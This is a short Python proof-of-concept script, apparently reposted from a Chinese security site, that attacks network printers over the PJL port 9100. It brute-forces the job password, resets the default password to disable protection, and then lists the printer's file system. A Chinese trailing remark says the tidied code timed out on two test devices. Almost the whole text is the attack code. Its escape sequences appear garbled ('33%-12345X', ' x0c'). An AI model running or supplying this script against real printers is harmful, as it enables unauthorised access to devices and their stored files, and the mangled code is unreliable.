#-*-coding=utf8-*- import socket import sys def main(): if len(sys.argv)<=1: print('Parameters error') return s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.settimeout(10) s.connect((sys.argv[1],9100)) s.settimeout(None) # 发送读取设备ID的PJL指令 s.send((' 33%-12345X@PJL INFO ID 33%-12345X ').encode('UTF-8')) print(s.recv(1024).decode('UTF-8')) for i in range(1, 65536): buf = b'' # 发送重置密码的PJL指令 s.send(('33%-12345X@PJL @PJL JOB PASSWORD=' + str(i) + ' @PJL DEFAULT PASSWORD=0 @PJL EOJ 33%-12345X ').encode('UTF-8')) if i%30 == 0: # 发送查询密码保护状态的PJL指令 s.send((' 33%-12345X@PJL @PJL DINQUIRE PASSWORD 33%-12345X ').encode('UTF-8')) while True: buf+=s.recv(1) print(buf) try: buf.index(b' x0c') try: # 密码保护被禁用 buf.index(b'DISABLED') print('password disabled ok!') # 发送查询目录的PJL指令 s.send((' 33%-12345X@PJL @PJL FSDIRLIST NAME = "0:\" ENTRY=1COUNT=99 33%-12345X ').encode('UTF-8')) buf = b'' while True: buf+= s.recv(1) print(buf) try: buf.index(b' x0c') try: # 查询成功 buf.index(b'ENTRY') print('PoC OK!') return except ValueError: print('PoC NO!') return except ValueError: continue except ValueError: print('password disabled faild!') finally: s.close() return except ValueError: continue s.close() if __name__ == '__main__': main()
来源:http://www.secbox.cn/hacker/client/6450.html 代码太乱 仅把代码整理了下..找了2台测试,都显示socket .timed out